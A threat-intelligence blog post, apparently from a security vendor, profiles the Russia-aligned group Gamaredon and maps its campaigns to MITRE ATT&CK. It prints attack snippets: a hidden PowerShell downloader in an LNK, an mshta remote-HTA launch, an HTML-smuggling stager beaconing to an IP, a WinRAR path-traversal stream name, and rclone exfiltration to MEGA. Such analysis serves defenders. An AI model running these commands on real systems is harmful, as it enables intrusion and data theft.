Gamaredon (Primitive Bear) APT Profile and MITRE ATT&CK Breakdown
| July 11, 2026
Key Takeaways
- Gamaredon is a Russia-aligned APT active since 2013, widely attributed to Russia's Federal Security Service.
- The group attempted to infect over 1,500 Ukrainian government systems and ran 5,000 attacks by late 2021.
- Gamaredon targets NATO members Bulgaria, Latvia, Lithuania, and Poland alongside its sustained Ukrainian espionage campaigns.
- The group acts as an access broker, breaching Ukrainian machines to hand initial access to the Turla APT.
- The Picus Platform lets teams simulate Gamaredon's tactics and validate security controls against this threat group.
Gamaredon (aka Primitive Bear) is a Russia-aligned advanced persistent threat (APT) group active since 2013 and widely attributed to Russia's Federal Security Service (FSB).
Focused on cyber espionage and data theft, the group has run sustained operations against Ukrainian government, defense, law enforcement, and critical infrastructure targets, having attempted to infect over 1,500 government systems by late 2021.
Its reach extends to NATO member states, including Bulgaria, Latvia, Lithuania, and Poland, and to Russian-speaking individuals across former Soviet states such as Uzbekistan, Kazakhstan, Tajikistan, and Kyrgyzstan, whom it surveils with the BoneSpy and PlainGnome Android spyware families.
Gamaredon has also served as an access broker for other Russian actors, breaching machines in Ukraine to hand initial access to the Turla APT.
In this blog, we will examine Gamaredon's major campaigns and break down its tactics, techniques, and procedures (TTPs). In the end, we will show how Picus Platform validates your security controls against this threat group.
Simulate APT Attacks with 14-Day Free Trial of Picus Platform
What Are the Major Activities of the Gamaredon?
2013 – Gamaredon begins operations, targeting Ukrainian government institutions for cyber espionage and data theft.
2021 – Fields the BoneSpy Android spyware, its first mobile surveillance tool, against Russian-speaking targets.
By November 2021 – Has carried out no fewer than 5,000 cyberattacks against Ukrainian public authorities and critical infrastructure and attempted to infect over 1,500 government systems.
August 2022 – Runs a targeted phishing operation against Ukrainian government, defense, and law enforcement agencies, deploying the Giddome and Pterodo malware families for long-term access.
December 2022 – Unsuccessfully attempts to breach a petroleum refining company within a NATO member state.
February 2023 – Runs GammaLoad and GammaSteel campaigns delivered through spear-phishing RAR archives, while also attempting to infiltrate NATO countries.
August 2024 – Introduces PteroGraphin, a PowerShell persistence tool that abuses Microsoft Excel add-ins, scheduled tasks, and the Telegraph API for C2.
September 2024 – Uses Cloudflare Tunnels in attacks against Ukraine and the NATO countries Bulgaria, Latvia, Lithuania, and Poland.
December 2024 – Deploys the Android spyware families BoneSpy and PlainGnome against Russian-speaking victims across former Soviet states such as Uzbekistan, Kazakhstan, Tajikistan, and Kyrgyzstan.
January 2025 – Breaches four machines in Ukraine, providing Turla APT with initial access.
February 26, 2025 – Begins an intrusion against a Western country's military mission in Ukraine, using an infected removable drive to deploy an updated GammaSteel [8].
March 2025 – Runs a campaign using Russian troop-movement lures to distribute LNK files and DLL side-load the Remcos RAT via geo-fenced servers in Russia and Germany.
January 2026 – Exploits the WinRAR path-traversal flaw CVE-2025-8088 to deliver the GammaPhish HTA payload, the GammaLoad VBScript downloader, the GammaWorm USB/LNK worm, and GammaSteel.
Which MITRE ATT&CK Techniques Are Used by Gamaredon?
Tactic: Resource Development
T1583.001 Acquire Infrastructure: Domains
Gamaredon continuously registers throwaway command-and-control (C2) domains, overwhelmingly under the .ru TLD, to stay ahead of domain-based blocklists.
Recent tradecraft pairs each operational domain with a "twin" domain registered on the same day, through the same registrar, and behind the same nameserver pair. Fallback C2 domains such as kosoyed[.]ru and kosoyed[.]online are registered simultaneously via REG.RU, sharing the Cloudflare nameserver pair doug.ns.cloudflare.com / fay.ns.cloudflare.com.
This .ru + .online dual-TLD registration pattern has been consistent across the group's fallback C2 domains for well over a year [1].
T1583.003 Acquire Infrastructure: Virtual Private Server
Gamaredon rents VPS instances from a rotating set of hosting providers to stand up its C2 servers. Historical infrastructure resolves to providers such as DigitalOcean, MivoCloud, TimeWeb, and "Global Internet Solutions LLC," with IP addresses changing frequently.
T1583.006 Acquire Infrastructure: Web Services
Rather than exposing owned infrastructure directly, Gamaredon fronts its staging and beaconing behind legitimate, disposable web services. It provisions Cloudflare Workers domains (*.workers.dev) shortly before each spearphishing wave, using the Workers domain as Stage 1 (delivery of GammaLoad, the group's custom downloader) and Stage 2 (beacon).
The group has also long abused Telegram channels, the Telegram publishing platform telegra.ph, teletype.in, and Cloudflare/ngrok tunneling services as intermediaries for resolving or reaching C2.
T1584.001 Compromise Infrastructure: Domains
Beyond registering fresh domains, Gamaredon hijacks aged, legitimate domains to inherit their clean reputation. The parked domain joymobile.com[.]ua (registered in 2020 to a small mobile retailer) was taken over via the owner's compromised registrar account.
T1586.002 Compromise Accounts: Email Accounts
Gamaredon frequently sends spearphishing from genuine, compromised mailboxes belonging to Ukrainian governmental, law-enforcement, and justice-system users.
In one wave, the operator authenticated to the legitimate hosting service freehost.com[.]ua with the stolen credentials of a city council mayor's office to relay malicious mail.
T1587.001 Develop Capabilities: Malware
Gamaredon develops its own malware rather than relying on commodity implants, auto-generating and parameterizing each build per wave so that high sample volume masks largely identical functionality.
Its most significant custom implants are GammaDrop, a VBScript dropper; GammaLoad, the VBScript/HTA downloader it delivers; and GammaSteel, a PowerShell infostealer [1][2]. These sit alongside the broad Ptero* family, dozens of PowerShell, VBScript, and C tools spanning downloaders, USB weaponizers, credential and messaging-app stealers, reverse shells, and proxies (for example PteroLNK, which spreads via removable drives) [4].
T1588.002 Obtain Capabilities: Tool
Gamaredon supplements custom malware with off-the-shelf and open-source tooling: the Remcos commercial backdoor [3]; the ReVBShell open-source VBScript reverse shell; the rclone cloud sync utility; the Cloudflare Tunnel client (cloudflared) and ngrok; and code lifted from the Amsi-Bypass-Powershell and Invoke-SocksProxy GitHub projects [4].
Tactic: Initial Access
T1091 Replication Through Removable Media
Gamaredon's PteroLNK weaponizer also drops LNK files onto every connected USB drive so the malware spreads to any machine into which the drive is later plugged.
Enticing double-extension filenames in English and Ukrainian (for example, Login_Password, мoбілізaція / "mobilization", записи_розмов / "conversation_records") are used to lure victims into clicking.
T1566.001 Phishing: Spearphishing Attachment
Gamaredon delivers RAR archives attached to spearphishing emails. A representative attachment, Судова_повістка_1_13_4_1882_18.03.2026.rar, carried a Ukrainian court-summons lure and exploited a WinRAR path-traversal flaw on extraction [1].
One campaign distributed LNK files compressed inside ZIP archives, disguised as Office documents with war-themed Russian and Ukrainian names referencing troop movements (for example Позиции противника запад и юго-запад.xlsx.lnk, "Positions of the enemy west and southwest") [3].
Gamaredon has also attached RAR/ZIP/7z/TAR archives each containing a single LNK, later switching to HTA attachments and then to HTML-smuggling attachments [4].
Tactic: Execution
T1047 Windows Management Instrumentation
GammaLoad queries WMI to fingerprint the host, retrieving the system-drive volume serial number [1]:
|
' GammaLoad host-profiling WMI query, with an FSO fallback ' Select VolumeSerialNumber from Win32_LogicalDisk Where DeviceID = '<%SYSTEMDRIVE%>' ' Fallback: Scripting.FileSystemObject.GetDrive().SerialNumber |
One intrusion used a WMI ping query as an execution guard, only proceeding if mil.gov.ua was reachable [2]:
|
' "Select * From Win32_PingStatus where Address = 'mil.gov.ua'" |
The PteroLNK weaponizer also uses WMI to enumerate removable drives [4]:
|
SELECT * FROM Win32_LogicalDisk WHERE MediaType = NULL |
T1059.001 Command and Scripting Interpreter: PowerShell
PowerShell is Gamaredon's primary implementation language for modern tooling.
During one intrusion, it fetched and executed a remote script directly in memory [2]:
|
# Base64/obfuscated server response launches an in-memory PowerShell stage
|
Gamaredon's broader Ptero* toolset is overwhelmingly PowerShell, routinely executing received code via Invoke-Expression.
T1059.007 Command and Scripting Interpreter: JavaScript
One intrusion executed a JavaScript one-liner via mshta.exe to spawn the VBScript chain [2]:
|
// mshta JavaScript stager: run a decoy explorer window, then the VBScript payload w = new ActiveXObject("WScript.Shell"); w.run("explorer files"); w.run("wscript.exe //e:vbScript \\~.drv"); window.close(); |
HTML-smuggling attachments used JavaScript to rebuild a base64-embedded RAR client-side and trigger its download without any network fetch [4]:
|
// HTML smuggling: decode an embedded archive and force a "download" locally var g4Y = navigator["platform"]; if (['Win32','Win64','Windows','WinCE'].indexOf(g4Y) == -1) die(); // only on Windows var Xul = document.createElement('a'); pSI = "UEsDBAoAAAAABdjCVc..."; // base64 RAR blob Xul.href = 'data:application/x-rar-compressed;base64, ' + pSI; Xul.download = "1532_08-08-2023.rar"; Xul.click(); // auto-download var img = document.createElement("img"); // tracking img.src = "http://94[.]198[.]221[.]21/mo.09.08"; |
T1106 Native API
PteroCDrop (a C dropper) writes its starter script and VBScript payload to disk and launches them through the CreateProcess Windows API rather than a shell.
PteroPowder (a C++ downloader) fetches a PowerShell script and launches it via ShellExecuteA with -ExecutionPolicy Bypass.
An example for illustration is given below:
|
/* Native-API process launch */ ShellExecuteA(NULL, "open", "powershell.exe", "-ExecutionPolicy Bypass <downloaded_script>", NULL, SW_HIDE); |
T1203 Exploitation for Client Execution
Gamaredon weaponizes RAR archives to exploit CVE-2025-8088, a WinRAR directory-traversal vulnerability.
The archive holds a benign-looking decoy PDF plus a VBScript payload stored as an NTFS alternate data stream whose stream name embeds a path-traversal sequence. On extraction, WinRAR resolves the stream name as a file path and writes the VBScript into the user's Startup folder:
|
# ADS stream name doubles as a traversal path, landing the .vbs in Startup Судова_повістка_..._18.03.2026.pdf:..\..\..\..\..\..\AppData\Roaming\Microsoft\Windows\..\..\Microsoft\Windows\StartMenu\Programs\..\Programs\..\Programs\Startup\1_13_4_1882_18.03.2026.vbs |
The redundant \Programs\..\Programs\..\Programs\ sequence is a Gamaredon-specific quirk that defeats WinRAR's traversal mitigations.
T1204.002 User Execution: Malicious File
Gamaredon relies on the victim opening a malicious file. Shortcuts (.lnk) are a primary vector: double-clicking one runs a hidden-window PowerShell downloader carried in the shortcut's command line [3]:
|
# LNK-embedded PowerShell downloader (string-broken to evade static AV) Powershell.exe -WindowStyle hidden ` echo <some_noise>; Write-Host <som_other_noise>; ... &(gcm i*wr) -uri http://staging-server/<payload>.zip -OutFile <payload>.zip # gcm -> Invoke-WebRequest }; Expand-Archive -Path <payload>.zip -DestinationPath <destionation_folder>; start <side-loader>.exe &(gcm *ke-*est) -uri http://staging-server/path/to/<decoy>.doc -OutFile <decoy>.doc; start <decoy>.doc # decoy document |
Note the Get-Command (gcm) wildcard indirection (gcm i*wr -> Invoke-WebRequest, gcm *ke-*est -> Invoke-RestMethod), which resolves cmdlet names at runtime to bypass string-based detection.
Tactic: Persistence
T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows)
Some PteroSand samples persist by writing a command line to the HKCU\Environment\UserInitMprLogonScript value, which Windows executes at logon.
T1053.005 Scheduled Task/Job: Scheduled Task
Scheduled tasks are a recurring persistence and re-execution mechanism for the Gameradon threat group.
An example command can be:
|
# Recurring task for downloader re-execution schtasks /create /tn "UpdateService" /tr "wscript.exe %APPDATA%\<downloader>.vbs" /sc minute /mo 5 /f |
T1137.001 Office Application Startup: Office Template Macros
PteroTemplate weaponizes the global Word template Normal.dotm by killing Word (taskkill /f /im WINWORD.EXE), enabling macros via the registry, and injecting a malicious VBA document_close procedure.
Every document based on the default template then drops and runs a VBScript downloader each time it is closed [4].
T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Run keys and the Startup folder are Gamaredon's most common persistence surfaces. GammaLoad establishes persistence through a RunOnce key that re-launches its dropped payload:
|
# GammaLoad RunOnce persistence HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\... |
GammaSteel registered itself under the Run key:
|
HKCU\...\CurrentVersion\Run\[USERNAME] |
Additionally, the CVE-2025-8088 exploit also achieves persistence directly by dropping GammaDrop into the Startup folder.
Tactic: Stealth
T1027.006 Obfuscated Files or Information: HTML Smuggling
An HTML email attachment lure used by Gamaredon carries a base64-encoded RAR inside its JavaScript, which is decoded and "downloaded" locally with no network request.
T1027.011 Obfuscated Files or Information: Fileless Storage
Gamaredon frequently stores payload fragments in the registry to avoid on-disk artifacts.
GammaSteel splits its payload across many HKCU\Software values (base64-encoded, one function per value) [2]:
|
# GammaSteel registry-resident payload fragments Set-ItemProperty -Path 'HKCU:\Software' -Name 'exampleName' -Value 'part_of_the_payload' |
T1027.013 Obfuscated Files or Information: Encrypted/Encoded File
Downloaded PE and VBScript payloads are XOR-encrypted with the system drive's volume serial number as the key.
GammaSteel and other tools base64-encode data before use and storage.
T1036.004 Masquerading: Masquerade Task or Service
Persistence artifacts are given benign, product-like names to blend in.
Run-key values such as UpdateService, Windows Sort Updater, and BoxerProtocol are used.
Also, as registry containers’ names, they masqueraded legitimate software (HKCU\Software\FedFox).
T1036.007 Masquerading: Double File Extension
Both the LNK and USB campaigns use double extensions so a shortcut appears to be a document: .docx.lnk and .rtf.lnk.
T1112 Modify Registry
PteroDoc and PteroTemplate weaken Office security by setting AccessVBOM and VBAWarnings to 1 under HKCU\Software\Microsoft\Office\<WordVersion>\Word\Security\.
GammaSteel modified Explorer\Advanced values (Hidden, ShowSuperHidden, HideFileExt) so dropped files stay invisible [2].
T1218.005 System Binary Proxy Execution: Mshta
mshta.exe is central to Gamaredon execution across every campaign: it proxies remote HTA execution from LNK attachments:
|
# LNK shortcut target proxying a remote HTA through mshta %WINDIR%\System32\mshta.exe http://<domain>[.]ru/path/to/remote_payload.hta |
T1480.001 Execution Guardrails: Environmental Keying
Payloads are keyed to the victim host: the XOR key for encrypted PE/VBScript payloads is the system drive's volume serial number, so a payload captured off-host cannot be decrypted without it.
Payload servers are additionally geo-fenced to Ukrainian victims, returning HTTP 403 to requests from other regions [3].
Tactic: Credential Access
T1539 Steal Web Session Cookie
PteroCookie steals cookie stores from Opera, Firefox, Chrome, and Edge.
For the Chromium browsers, it grabs the encrypted Cookies file plus the Local State key and decrypts the key on-host with:
|
[System.Security.Cryptography.ProtectedData]::Unprotect # In Windows Data Protection API (DPAPI) |
For Firefox, it exfiltrates cookies.sqlite from every profile.
T1552.002 Unsecured Credentials: Credentials in Registry
PteroSteal locates Outlook profiles by enumerating HKCU\SOFTWARE\Microsoft\Office for an IMAP Password value, then exfiltrates account details and the DPAPI-decrypted IMAP Password [4].
T1555.003 Credentials from Password Stores: Credentials from Web Browsers
PteroSteal harvests stored credentials from Opera, Edge, Chrome, and Firefox (and, in some variants, the Outlook and The Bat! mail clients).
For Chromium browsers, it pulls Login Data plus the Local State key and DPAPI-decrypts it.
For Firefox, it takes key3.db, key4.db, logins.json, and cert9.db from each profile [4].
Tactic: Discovery
T1518.001 Software Discovery: Security Software Discovery
PteroScout and the GammaSteel recon stage identify installed security products via WMI:
|
SELECT * FROM AntiVirusProduct |
Tactic: Lateral Movement
T1080 Taint Shared Content
Gamaredon deliberately weaponizes files it expects to be shared.
PteroDoc attaches a malicious remote-template reference to every .doc/.docx on removable, network, and fixed drives, so the infection travels whenever a document is forwarded within or outside the organization.
T1091 Replication Through Removable Media
PteroLNK spreads by copying itself and dropping lure LNK files onto connected USB drives. Clicking a dropped LNK re-executes the malware on the next host.
Tactic: Collection
T1005 Data from Local System
The final GammaSteel payload enumerates Desktop, Documents, and Downloads and collects files matching a hardcoded extension list:
|
*.doc, *.docx, *.xls, *.xlsx, *.ppt, *.pptx, *.vsd, *.vsdx, *.rtf, *.odt, *.txt, *.pdf |
Dedicated stealers also lift application data from Signal (%APPDATA%\Signal\sql\db.sqlite plus config.json), Telegram Desktop (tdata), and browser IndexedDB/LevelDB stores [4].
T1025 Data from Removable Media
PteroPSDoor continuously searches connected USB drives for the target extensions and stages matching files for later exfiltration.
T1039 Data from Network Shared Drive
PteroPSDoor and PteroVDoor search all mapped drives (excluding letters such as A, B, and Q) and immediately exfiltrate matching documents.
T1074.001 Data Staged: Local Data Staging
PteroPSDoor copies harvested files to a frequently renamed staging directory before upload and maintains a "custom database" (a text file of MD5 hashes computed from file path, size, and last-write time) to avoid re-exfiltrating the same file.
T1113 Screen Capture
PteroScreen captures all monitors to %TEMP%\<rand>.png, base64-encodes the image, and uploads it to C2.
PteroScout and the GammaSteel recon stage also grab screenshots as part of host profiling. GammaSteel, for example, captures the screen via System.Drawing, splitting property names to dodge AV [2]:
|
# GammaSteel screenshot capture via System.Drawing $b = [System.Windows.Forms.SystemInformation]::PrimaryMonitorSize $w = $b.("Wi","dt","h" -join ""); $h = $b.("H","ei","g","ht" -join "") $Image = New-Object System.Drawing.Bitmap($w,$h) $g = [System.Drawing.Graphics]::FromImage($Image) |
Tactic: Command and Control
T1008 Fallback Channels
GammaLoad is configured with a primary Cloudflare Workers C2 and a .ru fallback (behind Cloudflare); if the primary returns a body under 75 characters or HTTP 404, it sleeps 10 seconds and switches to the fallback.
T1071.001 Application Layer Protocol: Web Protocols
All campaigns beacon and exfiltrate over HTTP/HTTPS.
For example, GammaLoad issues GET requests to freshly randomized URLs and encodes victim data in the User-Agent header [1]:
|
# GammaLoad beacon: victim ID and check-in time smuggled in the User-Agent GET /k8f2ma.mov HTTP/1.1 User-Agent: Mozilla/5.0 ...Safari/537.36::WORKSTATION01_A30BDCA3::/.v4/7/2026 4:19:00 PM/. |
T1095 Non-Application Layer Protocol
PteroPShell is a bare TCP reverse shell that connects to a predefined IP and port, reads a command, runs it through Invoke-Expression, and returns the output.
T1102.001 Web Service: Dead Drop Resolver
Gamaredon publishes its live C2 address on legitimate services and reads it at runtime.
For example, GammaSteel resolves C2 from teletype.in, telegra.ph, and a Telegram channel, parsing markers such as ==107@189@19@137== [2].
T1568 Dynamic Resolution
Beyond fast flux, GammaLoad samples reference dynamic-DNS hostnames ( ddnsking[.]com, ddns[.]net) and use check-host[.]net to resolve fast-flux domains to their current IP.
T1572 Protocol Tunneling
The group tunnels C2 through legitimate services to hide the true destination.
PteroPSLoad ran the Cloudflare Tunnel client (cloudflared --url http://<ip>:80) and, in another version, ngrok, both on the free tier, so the request to the C2 no longer originated directly from PowerShell and carried no destination IP in the Host header [4].
Tactic: Exfiltration
T1041 Exfiltration Over C2 Channel
PteroPSDoor and PteroVDoor exfiltrate collected files directly over their HTTP(S) C2 channel via POST, and GammaSteel's primary path is a PowerShell web request to the same C2 that tasks it.
T1048 Exfiltration Over Alternative Protocol
When the primary web request fails, the updated GammaSteel falls back to cURL over a Tor SOCKS proxy (curl.exe -x socks5://…), packing host metadata and the file into multipart form fields.
T1567 Exfiltration Over Web Service
GammaSteel contains code that posts data to the write.as publishing API as a possible exfiltration channel [2]:
|
# write.as exfil attempt embedded in GammaSteel POST https://write.as/api/posts Content-Type: application/json {"body": "This is a post.", "title": "My First Post"} |
T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage
PteroClone uses rclone to synchronize local directories to attacker-controlled folders on MEGA cloud storage, and pulls staged payloads back down the same way [4]:
|
# PteroClone rclone sync to/from MEGA rclone sync %APPDATA%\Microsoft\Windows\SendTo mega:<pc_name>-d --no-console rclone sync %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup mega:<pc_name> -- |
How Picus Simulates Gamaredon Attacks?
We strongly suggest simulating Gamaredon Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Platform. You can also test your defenses against hundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for Gamaredon:
|
Threat ID |
Threat Name |
Attack Module |
|
48845 |
Gamaredon Threat Group Campaign |
Windows Endpoint |
|
59460 |
EvilGnome Malware Campaign |
Linux Endpoint |
|
56432 |
Gamaredon Threat Group Campaign Malware Download Threat - 2 |
Network Infiltration |
|
39135 |
Gamaredon Threat Group Campaign Malware Email Threat - 2 |
E-mail Infiltration |
|
25385 |
Gamaredon Threat Group Campaign Dropper Download Threat |
Network Infiltration |
|
70257 |
Gamaredon Threat Group Campaign Dropper Email Threat |
E-mail Infiltration |
|
79145 |
Gamaredon Threat Group Campaign Infostealer Download Threat |
Network Infiltration |
|
28837 |
Gamaredon Threat Group Campaign Infostealer Email Threat |
E-mail Infiltration |
|
83542 |
Gamaredon Threat Group Campaign Malware Download Threat - 1 |
Network Infiltration |
|
80763 |
Gamaredon Threat Group Campaign Malware Email Threat - 1 |
E-mail Infiltration |
|
74593 |
Gamaredon Threat Group Campaign Downloader Download Threat |
Network Infiltration |
|
78040 |
Gamaredon Threat Group Campaign Downloader Email Threat |
E-mail Infiltration |
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Platform.
What Are the Aliases of the Gamaredon Group?
Gamaredon is also known as: PRIMITIVE BEAR, Shuckworm, ACTINIUM, Actinium, Aqua Blizzard, Armageddon, Blue Otso, BlueAlpha, DEV-0157, G0047, Gamaredon, IRON TILDEN, SectorC08, Trident Ursa, UAC-0010, UNC530, Winterflounder.
References
[1] “Website.” [Online]. Available: https://harfanglab.io/insidethelab/gamaredon-gammadrop-gammaload/
[2] “Shuckworm Targets Foreign Military Mission Based in Ukraine.” Accessed: Jul. 08, 2026. [Online]. Available: https://www.security.com/threat-intelligence/shuckworm-ukraine-gammasteel
[3] G. Venere, “Gamaredon campaign abuses LNK files to distribute Remcos backdoor,” Cisco Talos Blog. Accessed: Jul. 08, 2026. [Online]. Available: https://blog.talosintelligence.com/gamaredon-campaign-distribute-remcos/
[4] “[No title].” Accessed: Jul. 08, 2026. [Online]. Available: https://web-assets.esetstatic.com/wls/en/papers/white-papers/cyberespionage-gamaredon-way.pdf
